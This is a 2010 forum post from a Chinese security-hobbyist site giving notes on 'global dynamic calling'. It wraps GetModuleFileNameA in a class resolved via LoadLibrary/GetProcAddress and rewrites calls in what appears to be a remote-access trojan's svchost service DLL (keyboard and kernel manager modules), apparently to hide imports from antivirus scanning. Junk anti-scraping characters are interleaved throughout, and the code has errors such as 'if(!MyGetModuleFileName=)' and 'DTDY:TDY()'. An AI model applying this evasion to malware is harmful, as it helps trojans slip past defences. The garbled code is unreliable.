标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
" ], f! Q8 S+ P" K& M( j
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
4 R9 r; w2 r; r
----------------------------------------
) R2 C. ~9 b2 n @% o$ [
DTDY.h:
2 j s8 n+ q+ b2 b) _( N* j2 P* ?
9 h/ V N$ q; R, g. W# l! L; [
#if _MSC_VER>1000
7 }! b+ R% w+ e2 j5 G$ R
#pragma once
) ^$ v; ^8 o2 N5 I2 K" w5 ^' j! U
#endif //_MSC_VER>1000
i; o/ |, p$ ]% z( r7 t8 L0 w% K! }
#include<windows.h>
4 L- ]! [1 R: Q, H! [( ?- G* j( ]
0 l" N) A# O" K1 C6 ]- B
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
4 {* ]. k, T# t3 X3 `
class DTDY
. O$ `# Y& R; }9 d2 V
{
/ _4 {* w9 r8 H" d) J
public:
6 f9 [. D3 }. s6 O: g8 B
DTDY();
9 o' _. M$ a2 K7 J1 d; Q' W
virtual ~DTDY();
( p: z5 U5 J# J$ p' Z
public:
- A( H& j$ S* q3 f+ t9 I+ y7 a/ Q8 _
static pGetModuleFileNameA MyGetModuleFileName;
& l, b) O+ R, P' \- I
static BOOL FunInitiallization();
" u& T' |% v6 s
};
5 [; _* E' }1 J6 M* Y
#endif
, N; O' M5 r) A$ V8 `5 g
----------------------------------------
V% Z, {# B+ F( R: o' B
8 S7 O6 i0 T2 z: A+ X2 [5 \) O
DTDY.cpp:
" r+ N( P6 s. ]! F# |+ \% j
2 f5 g. w( H, v# V5 E4 n6 w
#include "DTDY.h"
, H& E O1 H! V( J
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
& }# {$ Q' p0 m9 ?) g6 b
DTDY:TDY()
$ M) A. l; m4 j* k, Q3 z
{
% R1 J6 `; K: z" @/ I
}
/ W" c- @& O0 P1 c/ q7 O1 v, N3 x
DTDY::~DTDY()
3 v1 x, c9 }+ ?# |6 T9 |
{
4 E8 @& G/ _: Y
}
( T0 K w8 F2 j# p* K) i
BOOL DTDY::FunInitiallization()
8 ^- T# d' B- i' o& ?4 E: b
{
! n* ?9 J p+ k! g5 r' v
HMODULE hModule=LoadLibrary("kernel32.dll");
" f& i4 ~: j& _2 [* K! \$ S' o
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
& u) @& Z* ]3 j$ A
if(!MyGetModuleFileName=) return FALSE;
- R' x; [ y! m+ u
% o* l2 E1 f5 }+ B, U8 P
return TRUE;
! k$ S5 I$ o( E- q( Z; F5 V( s
}
1 Z) j/ u( g! w) P) j' ~( }
----------------------------------------
4 b6 a: J/ m' X" @: ^
svchost.cpp:
3 }6 F" s' o- K. C W: R7 Q
5 ?# B5 g% I0 \6 f
#include "DTDY.h"
7 F- D2 e2 Y! q; g4 \' o: A
4 V. A) X, D( E3 R7 |& d" x
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
2 A" |; `+ N' r
{
: \$ W, w6 U) ]/ K7 W; w' n+ w0 B
switch(ul_reason_for_call)
g% G# }) C1 O
{
% Z% D5 y! B8 E+ c. S8 C4 R
case DLL_PROCESS_ATTACH:
% C4 |$ A# S' h1 x( ^
if(!DTDY::FunInitiallization()) return FALSE;
# n0 K3 z0 [7 Q/ ? ~# q5 b: d' Y
; ]! r4 m1 Y- e0 r' o
break;
. D! f% O; b5 N8 \2 n, N
}
& [8 x2 v7 U* Q6 m- _" v, [! v7 E
}
3 X# ?( k* d- s- c2 c ^' N( {9 w
8 t: B( b; T% F, g
2 W5 Y3 a! l( o+ y4 d3 s
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
1 |* S5 t7 r. P! ]1 e' ^. _$ X' U
改写为
9 E! u7 h) { \
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
. r+ m1 Y5 |' r' _% \( |6 F! U
----------------------------------------
: R) T0 }( L5 @2 I* w9 o6 F8 d
KernelManager.cpp:
) \: B2 r) A7 i: W0 }
, D: u2 J: b Z2 r. M
#include "../DTDY.h"
8 C+ P: ~; ~6 P3 r5 a/ z' U
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
! S6 W9 T4 x" d/ Z/ @3 D" V5 g
改写为
) g7 I& f0 {2 b9 h& P
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
/ s n# \. D6 ]; J
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
